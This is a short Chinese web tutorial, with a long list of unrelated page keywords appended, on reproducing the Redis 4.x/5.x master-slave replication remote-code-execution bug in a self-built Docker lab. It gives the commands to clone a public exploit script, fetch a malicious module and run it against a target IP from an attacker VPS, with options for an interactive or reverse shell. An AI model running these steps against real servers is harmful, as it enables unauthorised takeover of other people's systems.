Redis基于主从复制的RCE 4.x/5.x怎么实现
发表于:2025-12-03 作者:千家信息网编辑
千家信息网最后更新 2025年12月03日,这篇文章主要讲解了"Redis基于主从复制的RCE 4.x/5.x怎么实现",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"Redis基于主从复制的RCE
千家信息网最后更新 2025年12月03日Redis基于主从复制的RCE 4.x/5.x怎么实现
这篇文章主要讲解了"Redis基于主从复制的RCE 4.x/5.x怎么实现",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"Redis基于主从复制的RCE 4.x/5.x怎么实现"吧!
首先拉取一个5.0镜像
docker search redis5.0 //查找镜像docker pull damonevking/redis5.0 //拉取下图第三个镜像
0x02 运行环境
运行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口并运行容器
访问你的ip+6379端口,如下图则说明搭建成功

0x03 漏洞利用
git clone https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本
注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下,然后执行如下命令:
python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打码了,师傅们不要搞我
需要注意,这里的-r后面是目标的ip,而-L后面则是你执行脚本的vps的ip
在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了

感谢各位的阅读,以上就是"Redis基于主从复制的RCE 4.x/5.x怎么实现"的内容了,经过本文的学习后,相信大家对Redis基于主从复制的RCE 4.x/5.x怎么实现这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!
主从
镜像
学习
运行
内容
容器
漏洞
目标
端口
脚本
成功
三个
下图
交互式
命令
就是
师傅
思路
情况
文件
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
沈阳雅译网络技术招聘
多串口服务器ip和端口配置
网络安全设备监控范围
下周关注网络安全
数据库重启服务
第三级网络安全等级保护建设
php采集网页部分数据库
hyper虚拟机管理服务器
p2p理财平台软件开发
伊川软件开发哪家强
mac常用软件开发
剑3女性捏人数据库
中峰乡软件开发培训
科技安全网络安全社会安全
象山ios软件开发
数据库技术应用哪方面
iphone数据库地址
SQL设置数据库为utf8
数据库 生成模拟数据
网络安全的十六方针
网络安全拦截怎么做
图像采集软件与数据库
远程办公网络安全
a5数据库locked数据
互联网安全法与网络安全法差异
在mysql中创建数据库
数据库学生考勤管理系统课程设计
人工智能与网络安全哪个好
无锡交易软件开发报价
打电话服务器拒绝